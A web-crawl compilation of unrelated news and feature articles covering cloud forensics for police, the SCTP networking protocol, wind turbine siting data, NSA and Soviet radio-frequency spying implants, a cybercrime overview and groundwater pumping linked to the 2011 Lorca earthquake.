She concludes: "There are those who are against anonymity because it prevents accountability of those with malicious intent and there are those who are for anonymity because there are those with good intent who are abused by others. There isn’t a single answer, you have to choose but you have to be aware of others opinions." | <urn:uuid:252c0db3-3480-44e3-81c1-8a14ca0e1e84> | CC-MAIN-2017-09 | http://www.cbronline.com/news/do-you-want-to-be-private-or-anonymous-on-the-net | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171608.86/warc/CC-MAIN-20170219104611-00476-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.967848 | 1,182 | 2.84375 | 3 |
With there now being more mobile phones on the planet than people and smartphones set to achieve saturation in just 10 years, unlocking the data held on them has increasingly needed to be used as vital evidence for police forces.
However as apps – and the data held within them – have moved into the cloud, police forces have struggled to follow this data into the ether. Law enforcement agencies could in fact be missing out on critical evidence if they don’t have technology in place to extract and analyse this evidence.
What makes it so valuable is that an increasingly large proportion of information now accessed on a modern device – whether that be via Gmail, Dropbox or WhatsApp – is actually stored in the cloud, not on the device itself.
Therefore, it is not data that can be easily accessible from traditional mobile or PC extraction techniques. Yet, this data is rich in potential case-solving content for police officers.
For example, there are applications that are designed to provide a more accurate search experience for the user, which in turn provides a minute by minute accurate log of where they were at any given moment. Thus being important evidence to either place a suspect at the scene of a crime or to corroborate an alibi.
The issue is that, historically, there has been no streamlined or standard method for gaining access to cloud-based data as there are a number of challenges to extracting it. One of the main issues has been the paradigm shift in a consumer’s view of their own security and privacy in the wake of numerous scaremongering media stories.
This has led to consumers not allowing global access to their data, but making their social media content and information 'private' so that it is restricted to only friends and family being able to view it.
This has made it more difficult and time consuming for law enforcement agencies to extract the required data without the subject revealing their credentials and the fear that the data may not be forensically preserved.
The Goldilocks effect
Identifying evidence in the cloud is a particular challenge because of the sheer amount of data now housed in the cloud, with current estimates suggesting that at least 2.5 quintillion bytes of data is added every day. Too much, and a search might be overbroad; too little, and investigators could miss important data for their case.
There are a number of challenges law enforcement agencies experience when relying on service providers to extract and provide them with the desired data. Firstly there is the costly legal procedures associated in filing a MLAT (mutual legal assistance treaty) request as the data often resides cross-border.
Secondly is the fact that a provider’s response will often be far from swift and more likely measured in weeks or months. Finally, there is the difficulty of a silo-ed analysis of a likely incomplete data set from multiple providers.
For investigators, this collection and analysis of data from distributed and disparate sources is challenging but an unavoidable truth as perpetrators will likely use multiple services from different providers.
Yet, they need to persevere as data from multiple social media, file sharing, or location-based data accounts (or mobile device) will enable them to contextualise a suspect’s or victim’s activities, whilst showing an investigator’s due diligence in building a case.
Extinguishing the burner phone
By investigators being able to effectively infiltrate the cloud, it reduces the risk of missing content, its context and meaning. By viewing and capturing data in context, and placing it alongside other data available from a suspect’s mobile device or operator’s call detail records, gives investigators further insight into how evidence correlates and can build up a solid case.
Even in cases where a wily suspect has used a so called ‘burner phone’ to conceal their identity, commonalities will likely exist between devices and cloud accounts. Therefore, investigators will still be able to tie devices and accounts to a suspect.
Be mindful of legal obligations
It is important for police forces to be mindful of legal obligation in regard to data privacy. To ensure this, an investigation will begin with extracting user data, including credentials and cloud access keys, found on a subject mobile device with the proper legal authority.
This account-based approach means that they will only selectively acquire data residing in the cloud that is associated with a specific user, unless the account is shared.
By doing so preserves the privacy of other tenants collocated on the same cloud server and minimises issues with evidence being scattered around different storage locations.
Specific cloud analysers designed for police forces promote forensic best practices around validation and authentication by relying on provider APIs to perform extractions. They will then hash (disguise) each individual artefact and, separately, the associated metadata. Not only does this ensure repeatability; it also allows for proper validation using records obtained directly from the service provider. This in turn helps speed the access to evidence and makes them instantly actionable for the investigation.
Prepare for the future
Most legacy digital forensic training materials are outdated as they were authored before the emergence of cloud-based environments. Therefore, investigators need training not just on cloud forensics policy and procedure, but also the foundation of cloud computing technology itself.
Otherwise, the lack of knowledge about cloud technology may interfere with remote investigations where systems are not physically accessible and there is an absence of proper tools to effectively investigate the cloud computing environment.
. Together with mobile device data, they can capture the details and critical connections investigators need to solve crimes.
By peering through the cloud to correlate evidence from multiple cloud-based accounts and disparate data formats, police forces can reduce the risk of missing valuable evidence for their investigations.
Sourced from Shahaf Rozanski, director of forensic products, Cellebrite | <urn:uuid:8a388b1b-63f7-42db-8e56-ffe9e6592c9b> | CC-MAIN-2017-09 | http://www.information-age.com/peering-through-cloud-how-cloud-data-can-be-vital-component-law-enforcement-123461065/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171608.86/warc/CC-MAIN-20170219104611-00476-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.944902 | 1,173 | 2.53125 | 3 |
Stream Control Transmission Protocol (SCTP) is a Transport Layer computer networking protocol, used to transmit multiple streams of data at the same time between two end points with a network connection. It ensures reliable, in-sequence transport of messages with congestion control, similar to Transmission Control Protocol (TCP) and User Datagram Protocol (UDP).
In contrast to TCP, SCTP ensures the complete concurrent transmission of several streams of data in “messages” between connected end points. This means that if data is lost in one stream, delivery will not be affected for the other streams. SCTP assigns a sequence number to each message sent in a stream to preserve byte order in the stream, allowing independent ordering of messages in different streams and processing messages in the order received instead of the order sent.
SCTP also supports multihoming, so a connected end point can have alternate IP addresses to route around network failure or changing conditions. Sometimes referred to as "next generation TCP," SCTP supports Signaling System 7 (SS7) telephone connection over the Internet and enables management of connections over a wireless network and transmission of multimedia data.
SCTP was defined by the Internet Engineering Task Force (IETF) Signaling Transport (Sigtran) working group in 2000, including Cisco’s Randall Stewart and Peter Lei. They collaborated with colleagues from Aciri, Ericsson, Nortel Networks, Siemens, Telecordia, and UCLA. SCTP is maintained by Stewart and the IETF Transport Area (TSVWG) working group, including Lei and Michael Tuexen. Additional maintainers focus on the Mac Operating System and v6 mobility.
SCTP has been implemented for a number of operating systems including: | <urn:uuid:665970a5-832c-47b8-81ef-8e72b7bfd4b2> | CC-MAIN-2017-09 | http://www.cisco.com/c/en/us/about/open-source/open-standards/sigtran.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170651.78/warc/CC-MAIN-20170219104610-00296-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.907694 | 359 | 3.515625 | 4 |
That breeze you feel? It's more than just a pleasant sensation on your face.
We don't often think of it, but the wind represents the heating and cooling cycle of 5.5 quadrillion tons of air by a medium-sized star about eight light-minutes away. Heated air rises, and cooler air meanders, rushes, or otherwise moves in to fill the void.
While our atmosphere is fluid and dynamic, the shape of the land and the water over which the air moves is decidedly less so, which eventually creates patterns of wind and weather that can be predictable ... if you have enough data.
Knowing the wind patterns is more than being thorough about the weather. It's also critical to optimizing wind energy production, which is growing in global capacity by double-digit percentages each year.
According to the World Wind Energy Association, by the end of 2010, the power of the wind provided 430 terawatt-hours of electricity to the nations of the world, more than enough to completely power the United Kingdom, the sixth largest economy in the world.
While that sounds like a lot of power, it should be noted that, according to the same report, this also represents just 2.5 percent of global electricity demand. But statistics from The Wind Power Database show that the global capacity it tracks has grown an average of 29.2 percent annually since 1995. In five years, that could put wind power capacity at 1,548 terawatt-hours, or nine percent of current global demand.
Projections aside, there's a lot of energy to be had right now in wind energy, but like anything that depends on nature as a resource, there's also a lot of risk.
Hitting the target
If you look at the US Department of Energy's wind resources map, even the most casual observer can see that some areas of the country are better suited for wind energy production than others.
And to a large degree, many onshore wind farms are indeed located in the areas of larger wind potential. If you travel to western Indiana, you should expect to find a number of wind farms, and sure enough, there are many wind turbines dotting the flat western Indiana farmland.
But getting wind turbines to be hyper-efficient means more than just plunking a few down in a generally windy area, and raking in the power and the money. Companies, investors, and power consumers must know what to expect to the highest degree of certainty. Having a turbine under-perform can drastically reduce the return on investment in these multi-million dollar machines. The opposite is true, as well. Put a wind turbine in a windier area for which it was designed, and you will damage a turbine faster, sometimes catastrophically.
This is the challenge that faces the Danish turbine manufacturer Vestas Wind Systems A/S. The company has made and installed more than 43,000 land-based wind turbines in 66 nations since its inception in 1979. Vestas turbines are responsible for generating 90 terawatt-hours -- just over 20 percent -- of the world's wind power alone.
To help them achieve optimal wind turbine placement and better operational control and forecasting of the turbines once they are installed, Vestas has relied on its own wind library, which includes data from 35,000 global weather stations, as well as data that's incoming from its own turbines. | <urn:uuid:c356aa6f-e0dc-4fe1-8587-2abd273e2938> | CC-MAIN-2017-09 | http://www.itworld.com/article/2721868/big-data/turbine-company-knows-which-way-the-wind-blows-at-your-house.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171834.68/warc/CC-MAIN-20170219104611-00348-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.957529 | 690 | 2.921875 | 3 |
Reports this week that the National Security Agency uses radio signals to collect data from tens of thousands of non-U.S. computers, some not connected to the Internet, is sure to fuel more acrimony towards the U.S. spy agency.
But observers note that the NSA is not the first of the world's spy agencies to use such technology to surreptitiously gather classified information from other countries.
For instance, intelligence personnel in the former Soviet Union used similar tactics to secretly gather information from electric typewriters at U.S. government offices in Moscow and Leningrad more than 30 years ago. And experts say it's a near certainty that the spy agencies of other advanced nations are doing the same thing today.
"Physical compromise of a target's technology is what we expect intelligence agencies to do," said John Pescatore, director of emerging technology at the SANS Institute and a former NSA security engineer.
"The Chinese have been doing it to the laptops and smartphones of foreign executives visiting China. Years ago the French did similar things in their country and I'm sure British intelligence has done the same thing," Pescatore said. "What the NSA is doing now is what all superpower intelligence agencies have done, are doing, and will do."
The New York Times reported Tuesday that documents leaked last year by former NSA contractor Edward Snowden disclosed that the NSA has embedded software and hardware "bugs" in some 100,000 targeted systems around the world. The "bugs" allow the NSA to collect information from the systems even when they are not connected to the Internet.
The technology, which has to be physically installed in most cases, has been available since at least 2008. It "relies on a covert channel of radio waves that can be transmitted from tiny circuit boards and USB cards inserted surreptitiously into the computers," according to the Times report. Data captured by the devices are sent to small briefcase-sized relay stations often set up miles away from the target system.
The software has apparently allowed the NSA to do an end-run around whatever cybersecurity controls are installed on the compromised systems.
The spy technology is said to be part of an intelligence operation, code-named Quantum, that mostly targets units of the Chinese Army, Russian military networks and systems used by drug cartels and police in Mexico. The program also targets European Union trade institutions, and government agencies in India, Pakistan and Saudi Arabia.
"They [bugs] are very impressive," said noted security researcher and cryptographer Bruce Schneier, CTO at Co3 Systems. "These hardware implants show that the NSA has been continuing its research and development since the Cold War, which is what we should expect."
However, experts do note that the collection of information via radio frequency is not new.
In the mid-1980s, Soviet secret police planted electromechanical bugs in numerous electric typewriters at the U.S. embassy in Moscow and its consular office in Leningrad. Like the NSA implants described in the Times story, the Soviet bugs transmitted data using radio waves.
Declassified NSA documents describe how the bugged typewriters allowed the Soviets to access copies of routine memos and classified documents, oftentimes before U.S officials read them.
Between 1976 and 1984, the Soviets installed the bugs on 16 IBM Selectric typewriters. The bugs operated at 30, 60 or 90 Mhz range via radio frequency and were concealed in a metal bar, called the comb supporter, in the typewriters.
The Soviets upgraded the implants several times and eventually completed work on five generations, three that operated on DC power and two on AC power. The bugs could be installed in 30 minutes or less, could be switched on and off remotely and contained integrated circuits that were very advanced for the times, according to the NSA documents. Some had beacons that indicated when the electric typewriters were turned on or off.
The implants were designed to pick up the magnetic energy generated when a typewriter key was struck, convert it into digital electrical signals and transmit it via radio frequency to a nearby Soviet listening post. According to the NSA post-mortem, the bug marked the first time that data was captured in this fashion from a device that held plaintext information.
The discovery of the implants triggered an NSA response, codenamed GUNMAN, that eventually led to the replacement of more than 11 tons of equipment in the offices targeted by the Soviets. It also prompted sweeping changes in U.S. State Department security practices and an overhaul of the U.S. technology and techniques used to detect and respond to electronic threats.
"This was in the 1980s when electric typewriters were the PCs of the day," Pescatore said. "The NSA was also doing the same thing to the Soviets back then -- the Soviets were just better at the time."
Schneier added and the NSA "might have a larger budget than anyone else in the world, but they're not made of magic. These are the sorts of techniques that any well funded national intelligence agency would employ and -- as they get cheaper -- criminals will employ."
Jaikumar Vijayan covers data security and privacy issues, financial services security and e-voting for Computerworld. Follow Jaikumar on Twitter at @jaivijayan, or subscribe to Jaikumar's RSS feed . His email address is email@example.com.
Read more about cyberwarfare in Computerworld's Cyberwarfare Topic Center. | <urn:uuid:cefcbe81-9edc-4b8b-86fc-f7ee71db602c> | CC-MAIN-2017-09 | http://www.computerworld.com.au/article/535996/spy_agencies_around_world_use_radio_signals_tap_data_from_targeted_systems/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170696.61/warc/CC-MAIN-20170219104610-00644-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.962173 | 1,128 | 2.640625 | 3 |
Discover the ways in which cybercrime occurs in three realms: individual, business, and governmental. Learn what you can do to protect yourself and your organization.
During the 1920s and 1930s in the United States, there was a rather famous bank robber named Willie Sutton. He was called "The Gentleman Bank Robber" because of his demeanor and natty dress style. Ultimately, he was arrested. Recycling an anecdote from an earlier blog, the authorities reportedly asked him why he robbed banks. As the legend goes, he responded, "Because that's where the money is." As far back as 2009, an episode of "60 Minutes" on cybercrime and cyberwarfare interviewed Shawn Henry of the FBI. Now at CrowdStrike, Mr. Henry talked about a coordinated raid on the banking system in 29 countries through simultaneous withdrawals at ATM kiosks. This crime, which cost ten million dollars, was performed using stolen credit card numbers. To paraphrase Mr. Henry it would be "front-page news" if that was carried out with guns blazing. Hackers, then, are committing cybercrime across the Internet with techniques ranging from identity theft to stealing credit cards to stealing intellectual property in order to profit from their crimes, commit espionage, or for geopolitical and social causes.
Considering the credit card black market and the theft of information from major retailers, hotel chains, and restaurants, the value of the cybercrime grows dramatically.
For the victims-individual or corporate-the consequences are personal. When a criminal accesses someone's personally identifiable information (PII), financial information, identity, or personal health information (PHI) and uses it to carry out fraud, the effects have been likened to the sense of violation and mourning that matches being told they have a serious health problem. After a breach, businesses need to expend resources to close the vulnerabilities that the criminals exploited and (perhaps) compensate customers financially or with services such as Identity Theft Protection. They also suffer the intangible costs (we call this qualitative risk) of loss of customer trust and loyalty. Even if a company isn't charging for services (such as an information website,) the lingering "bad taste" of the cyber-attack stays with the consumers.
Victims of Cybercrime
Broadly, as in life, we can look at the victims of cybercrime in three realms: individual, business, and governmental.
Carried out against individuals, the purpose of the attack may be to gather PHI or financial information to carry out an electronic robbery. Alternately, it may be to commandeer the victim's system into a so-called Botnet and then use the victim computer for sending SPAM or for a Denial-of-Service (DoS) attack. Here, as well, the bad actors may be cyber-gangs, individuals, or nation-states.
Cybercrime against consumers takes on two forms, but the results are generally the same. An individual may have their financial information misused or their "identity" stolen. For example, criminals have stolen my credit card number to rent hotel rooms in Accra (the capital of Ghana) and someone once tried to bail a friend out of jail with my information. Obviously, the latter did not work out well for any of the criminals, either in custody or soon-to-be. A much tougher problem for individuals occurs when "identity theft" takes place and the criminals use someone else's PII to obtain a loan or perform some other action that appears on the victim's credit report.
Individuals can also be victims of personally directed cybercrime. Stories of cyber-stalking, cyber-bullying, and online harassment regularly appear in newspapers and on news websites. With the growth in use of social media, this has taken on a new importance.
Businesses must be concerned about the theft of their customers' information, whether that is account information, residential and email address, or payment data such as credit card information. Hacks that disclose PII and financial information have been in the news continually (it seems) since December 2013. Facing customers and the Internet, website defacement can prove an embarrassment (at the least) to a company, as can having their Internet presences brought down by DoS attacks. Responses to these attacks cost money and resources to fix. They also engender lack of trust amongst their customers. | <urn:uuid:43384854-21c6-4f96-82ac-b5f6ca6cc6d6> | CC-MAIN-2017-09 | https://www.globalknowledge.com/ca-en/resources/resource-library/white-paper/cybercrime-101/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171232.43/warc/CC-MAIN-20170219104611-00040-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.951868 | 887 | 3.328125 | 3 |
Fact: We need fast, reliable Internet. And increasingly, we need it everywhere.
Nearly three-quarters of us believe that having high-speed Internet in every room of the house is either vitally important or very important. That’s according to our latest Consumer Entertainment Index study.
High-speed Internet is so important because it is related to almost everything we do, from video chatting with our family and friends to streaming movies on Netflix® and gaming over the Playstation® and Xbox One networks. A lot of things run expressly on the Internet, and the Internet, in turn, relies on the devices that deliver it throughout our homes.
Today we’re going to talk about the four most important ones: modems, Wi-Fi® routers, broadband gateways, and extenders.
The first piece of the puzzle is your modem: it brings the Internet into your home. Because it’s your home’s primary connection to the Internet, it’s arguably the most important device.
Of course, we all just want Wi-Fi without limits, and for that, you need a Wi-Fi router. It takes the Internet from your modem and creates a wireless signal that you can access throughout your home. But keep in mind that the strength of that wireless signal changes based on things inside your home, like the type of walls or floors it has to go through or how far away it is from the devices that it’s communicating with (i.e. tablets, cellphones)
A gateway is a device that combines the modem and Wi-Fi router into a single device. It brings the Internet signal into your home and also transmits it wirelessly.
So now we have our modem, router and gateway—but what happens when there’s a room in your home where the Wi-Fi is very weak or non-existent? There are many ways to improve the range of the Internet in your home, but one of the simplest and most cost-efficient is using a Wi-Fi network extender or repeater. It receives the wireless signal from your router or gateway and boosts it a further distance than the router may be capable of broadcasting on its own—like a megaphone does with your voice. But keep in mind that each wireless repeater cuts your bandwidth in half. So while it allows you to cover more ground, you’ll also lose some effective speed.
Now that we’ve talked about how these networking pieces work together, how do you know which one to buy? Check out our SURFboard web site for more information. | <urn:uuid:32a268e6-5d08-4555-b25a-397d5d951e8c> | CC-MAIN-2017-09 | http://www.arriseverywhere.com/tag/internet/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171632.91/warc/CC-MAIN-20170219104611-00216-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.935367 | 533 | 2.515625 | 3 |
Google Ideas announces tools to combat online censorship #FreedomOfSpeech
Access to the internet and the ease of communication it affords us is something we now take for granted. In a sense this is how it should be -- access to the internet really should be seen as a right. But in all too many countries around the world, citizens find that government and dictatorships block or restrict access to the internet, or close down sites that speak out against regimes. This is something Google is keen to be involved in stopping, and this week launched a series of tools to help in the fight.
It's an idea which echoes of the Alliance for Affordable Internet campaign to make internet access cheaper, and Internet.org's dream of connecting the world, but there is a rather more political edge to it.
Google Ideas -- described as the company's "think/do tank" -- is partnering up with Council on Foreign Relations and the Gen Next Foundation to host a summit at which the problem of tackling restrictive online censorship will be addressed. At the same time, three tools will be released that help to promote the idea of online freedom of speech.
Director of Google Ideas, Jared Cohen, says:
"Information technologies have transformed conflict in our connected world, and access to the free flow of information is increasingly critical. This week’s summit -- as well as [the tools] -- are all steps we-re taking to help those fighting for free expression around the globe."
Project Shield can be used by organizations disseminating information about elections, human rights and news to use Google technology to help avoid DDoS attacks. Digital Attack Map is a fascinating tool that display realtime information about DDoS attacks as they take place around the world. Rounding off the trio of tools is uProxy, a browser extension that helps to secure sensitive data against detection and censorship.
Find out more at the Google Ideas blog where there's also an introductory video. | <urn:uuid:cd6db530-3023-4b57-ba77-97eaf02128a2> | CC-MAIN-2017-09 | https://betanews.com/2013/10/21/google-ideas-announces-tools-to-combat-online-censorship-freedomofspeech/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171632.91/warc/CC-MAIN-20170219104611-00216-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.934663 | 391 | 2.625 | 3 |
Back in the 1970s, Kotaku Wamura, then-mayor of Fudai, Japan, built a huge floodgate between his town and the sea as protection from tsunamis. He had a difficult time of it -- it was ugly, and it cost more than $30 million in today's dollars. But in March 2011, the floodgate saved Fudai from the tsunami that hit and destroyed many other coastal Japanese cities. Wamura died in 1997, and while he never saw the results of his work, people visited his grave to give thanks.
The question of how to protect people and infrastructure from catastrophic floods, storms and hurricanes has become much more difficult in the wake of so-called "100-year events" that seem to occur much more frequently lately, with sometimes horrific consequences. In 2005, for example, Hurricane Katrina cost $100 billion in damages and nearly 2,000 lives. Then Superstorm Sandy caused an estimated $65 billion in damages in 2012, along with the loss of nearly 300 lives in seven countries. While no one reasonably expects to be 100 percent safe from events like these, what can be done to mitigate deaths and damage, and how much protection can be achieved per dollar of infrastructure investment?
Last year President Obama released an Action Plan for Climate Change, which directed agencies to support "climate-resilient" investment in transportation, water management and disaster relief. So what does disaster resilient mean?
"Building disaster resilience," according to the U.K. Department for International Development, "is the term we use to describe the process of helping communities and countries to be better prepared to withstand and rapidly recover from a shock such as an earthquake, drought, flood or cyclone."
According to Obama's action plan, the National Institute of Standards and Technology will begin developing disaster resilience standards, frameworks and guidelines. In addition, the president's 2014 budget proposed $200 million to help communities enhance preparedness and planning. In addition, E&E News reports that the U.S. Department of Transportation announced a $3 billion fund last year for public transit systems. The effort includes things like elevating subway ventilation grates to prevent floodwaters from rushing in.
Between this kind of low-hanging fruit on one end of the spectrum and the "move everyone away from the sea and build concrete bunkers to live in" on the other, is a vast middle ground of actions that can help. Better flood maps, coastal zoning, construction standards and more will be evaluated by the amount of protection afforded and the costs involved.
While Wamura's floodgate is not practical for many locations, selecting and upgrading infrastructure around disaster resilience could spell the difference between destruction and survival. | <urn:uuid:c49c7f63-9f86-4b06-9246-95e059b0450d> | CC-MAIN-2017-09 | http://www.govtech.com/public-safety/House-of-Brick-Disaster-Resilience.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172649.58/warc/CC-MAIN-20170219104612-00568-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.963091 | 549 | 3.046875 | 3 |
The Internet is becoming harder to browse for users of Tor, the anonymity network that provides greater privacy, according to a new study.
The blame can be placed largely on those who use Tor, short for The Onion Router, for spamming or cyberattacks. But the fallout means that those who want to benefit from the system's privacy protections are sometimes locked out.
Researchers scanned the entire IPv4 address space and found that 1.3 million websites will not allow a connection coming from a known Tor exit node. Also, some 3.67 percent of Alexa's top 1000 websites will block Tor users at the application level.
It results in Tor users "effectively being relegated to the role of second-class citizens on the Internet," they wrote.
"Anonymous communication on the Internet is a critical resource for people whose access to the Internet is restricted by governments," the paper reads. "However, the utility of anonymity networks is threatened by services on the Internet that block or degrade requests from anonymous users."
Tor is a network of distributed nodes that provide greater privacy by encrypting a person’s browsing traffic and routing that traffic through random proxy servers. The project was started by the U.S. Naval Research Laboratory although it is now maintained by the nonprofit Tor Project.
Using Tor requires downloading a specialized version of the Firefox browser. When a person visits a website, the website only sees the IP address of the so-called Tor "exit node" server, which could be anywhere in the world.
The problem is that while Tor is used by people looking to safeguard their privacy, it's also used by cyberattackers to mask their activities.
Because of that, some companies that provide specialized and attack-resistant content delivery systems have either blocked or made it difficult for those using Tor to access services, the researchers wrote.
CloudFlare, a large content delivery service, does not explicitly block Tor users, but it does assign a reputation score to Tor exit nodes. If an IP address has a poor reputation, visitors that have come through via that flagged exit node might see a CAPTCHA, the jumbled text that users have to solve before proceeding.
The Tor Project has a list of commonly seen blocking messages, including one from Akamai, another large content delivery service. Craigslist and Yelp also appear to have their own custom detection algorithms to limit Tor users.
Google and Yahoo do not block Tor for search, but the researchers noticed that some pages and functions within those sites were blocked.
"While many websites block Tor to reduce abuse, doing so inadvertently impacts users from censored countries who do not have other ways to access censored Internet content," they wrote.
The paper was authored by Sheharbano Khattak, David Fifield, Sadia Afroz, Mobin Javed, Srikanth Sundaresan, Vern Paxson, Steven J. Murdoch and Damon McCoy. | <urn:uuid:0832e182-c36f-46db-a170-4661b5958dd9> | CC-MAIN-2017-09 | http://www.itnews.com/article/3037178/tor-users-increasingly-treated-like-second-class-web-citizens.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170521.30/warc/CC-MAIN-20170219104610-00512-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.953275 | 589 | 2.671875 | 3 |
Bitcoin is a new online digital currency which has been in the news recently because of its dramatic price fluctuations. The currency uses peer-to-peer networking for transfers, whereas digital certificates, cryptographics, and decentralised processing provide security. It has been referred to as MOIP – Money Over Internet Protocol.
Bitcoin is a global currency – anyone in the world can open a Bitcoin account, and accept payment for goods and services, or donations, into the account. Bitcoins can also be purchased in the local currency through an exchange. Bitcoins can be transferred directly to anyone who has an account (a Bitcoin address). Transaction costs are low and Bitcoin transactions are irreversible.
Mt Gox is the largest Bitcoin exchange. Bitcoin market prices in the second half of 2012 fluctuated between $6-$12 USD. Prices peaked at $266 on April 10, 2013, and have been hovering above $100 per Bitcoin since then.
The early adopters of Bitcoins were WordPress, Wikileaks, Reddit, and some non-profit organisations who accept donations. The currency is slowly gaining traction amongst companies and BitPay have so far registered about 7,500 retailers. BitPay makes it easier for retailers to accept Bitcoin as payment for goods and services, and to convert Bitcoins into the local currency.
By limiting the supply to 21 million Bitcoins, it is hoped that scarcity will be maintained, which is essential for the value of the currency. If demand grows from more and more people wanting Bitcoins, a limited supply will push the price up. So far, about 10 million Bitcoins have been released into circulation. A mechanism called mining is used to add new Bitcoins into the system at a rate of about 300 per hour. Portions of Bitcoins can be used in transactions, such as a hundredth, thousandth, or millionth, of a Bitcoin.
Credit systems such as Mastercard and Visa required centralised data processing to ensure correct flows and tracking of funds. Bitcoin’s processing consists of adding new transactions to the overall ledger and keeping track of balances in every account. This processing is decentralised in a distributed computing project – anyone can add their computer to the network to assist with the processing and will get paid in newly-issued Bitcoins, through a process called mining. It is this decentralised processing which provides the currency with protection from interference and resilience. Effective Bitcoin mining rigs are now very expensive however.
The Bitcoin currency is global and not controlled by any government or central body. The distributed computing code which checks the ledger after transactions is open source.
Anonymity is possible using the Bitcoin. For this reason it is the currency of choice in the dark web Silk Road marketplace accessible through the Tor network, where drugs are traded. This has attracted bad press for the currency.
Individual security comes from a public/private key infrastructure. Each account (or address) is identified by the public key. Payments made to an account are sent it to the address which is the public key. The private key associated with that address is used to make payments from the account. Individuals using the currency need to employ their own security measures to protect their private key. If the private key is lost, the Bitcoins at the address cannot be accessed. If the private key is stolen, someone else can access the Bitcoins. Users are encouraged to keep two accounts – one for everyday purchases where the private key is stored in a Wallet on their mobile phone, and the other (like a savings account) where larger amounts are stored and the private key is stored encrypted in a safe place. Backup copies should also be kept separately, in different locations and on different mediums.
Will Bitcoin make the world dance? Will it progress beyond a small group of drug dealers, libertarians, and computer geeks? Only time will tell. The concept is certainly interesting and fulfils certain needs. If its usage increases, the price will increase due to limited supply. Investors will be sure to keep an eye on it from this perspective, but Bitcoins are risky – you should not put more in than what you are prepared to lose. Some believe that Bitcoin could make Mastercard and Visa obsolete. If successful, Bitcoin certainly has the potential to have a disruptive effect on local currencies. | <urn:uuid:1466ca6d-3c5e-4632-93fc-008356e73622> | CC-MAIN-2017-09 | https://dwaterson.com/2013/06/30/bitcoin-its-all-about-the-money-money-money/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170521.30/warc/CC-MAIN-20170219104610-00512-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.947575 | 847 | 3 | 3 |
Bagle, a new Internet Worm, Makes Its Presence Felt
19 Jan 2004
Kaspersky Lab, a leading information security software developer is warning users about I-Worm.Bagle, a new Internet worm detected in the wild. The worm spreads via email with a random sender address. Kaspersky Lab has received reports of infections from around the world; Bagle is causing a significant outbreak.
The worm is a Windows EXE file about 15 KB in size attached to emails with random sender addresses. The subject, 'Hi', body, 'Test =)' and signature 'Test, yep' are constant, whereas the name of the attachment is random.
Once the worm is launched, it copies itself into the Windows directory and attempts to download and launch Mitglieder, a Trojan proxy server, on the infected machine. This proxy server allows the 'master' to use the infected machine as a platform to send more copies of the malicious code. Currently, all links to Internet sources for downloading Mitglieder are deleted. Thus, I-Worm.Bagle cannot use this technology to increase propagation speed.
As a result, at this time, I-Worm.Bagle is using a technique standard for Trojan programs. Bagle scans the file system on infected machines for files with extensions wab, txt, htm and r1. The worm then sends copies of itself to all email addresses that it uncovers, using a built in SMTP server.
Kaspersky® Anti-Virus databases have already been updated with protection against Bagle | <urn:uuid:2299c62d-5b7f-46e1-bd2d-a7ac1680e586> | CC-MAIN-2017-09 | http://www.kaspersky.com/au/about/news/virus/2004/Bagle_a_new_Internet_Worm_Makes_Its_Presence_Felt | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170794.46/warc/CC-MAIN-20170219104610-00036-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.862757 | 325 | 2.71875 | 3 |
MADRID (AP) — Farmers drilling ever deeper wells over decades to water their crops likely contributed to a deadly earthquake in southern Spain last year, a new study suggests. The findings may add to concerns about the effects of new energy extraction and waste disposal technologies.
Nine people died and nearly 300 were injured when an unusually shallow magnitude-5.1 quake hit the town of Lorca on May 11, 2011. It was the country's worst quake in more than 50 years, causing millions of euros in damage to a region with an already fragile economy.
Using satellite images, scientists from Canada, Italy and Spain found the quake ruptured a fault running near a basin that had been weakened by 50 years of groundwater extraction in the area.
During this period, the water table dropped by 250 meters (274 yards) as farmers bored ever deeper wells to help produce the fruit, vegetables and meat that are exported from Lorca to the rest of Europe. In other words, the industry that propped up the local economy in southern Spain may have undermined the very ground on which Lorca is built.
The researchers noted that even without the strain caused by water extraction, a quake would likely have occurred at some point.
But the extra stress of pumping vast amounts of water from a nearby aquifer may have been enough to trigger a quake at that particular time and place, said lead researcher Pablo J. Gonzalez of the University of Western Ontario, Canada.
Miguel de las Doblas Lavigne, a geologist with Spain's National Natural Science Museum who has worked on the same theory but was not involved in the study, said the Lorca quake was in the cards.
"This has been going on for years in the Mediterranean areas, all very famous for their agriculture and plastic greenhouses. They are just sucking all the water out of the aquifers, drying them out," he told The Associated Press in a telephone interview. "From Lorca to (the regional capital of) Murcia you can find a very depleted water level."
De las Doblas said it was "no coincidence that all the aftershocks were located on the exact position of maximum depletion."
"The reason is clearly related to the farming, it's like a sponge you drain the water from; the weight of the rocks makes the terrain subside and any small variation near a very active fault like the Alhama de Murcia may be the straw that breaks the camel(asterisk)s back, which is what happened," he said.
He said excess water extraction was common in Spain.
"Everybody digs their own well, they don't care about anything," he said. "I think in Lorca you may find that some 80 percent of wells are illegal."
Lorca town hall environment chief Melchor Morales said the problem dates back to the 1960s when the region opted to step up its agriculture production and when underground water was considered private property. A 1986 law has reduced the amount of well pumping, he said.
Not everyone agreed with the conclusion of the study, which was published online Sunday in Nature Geoscience.
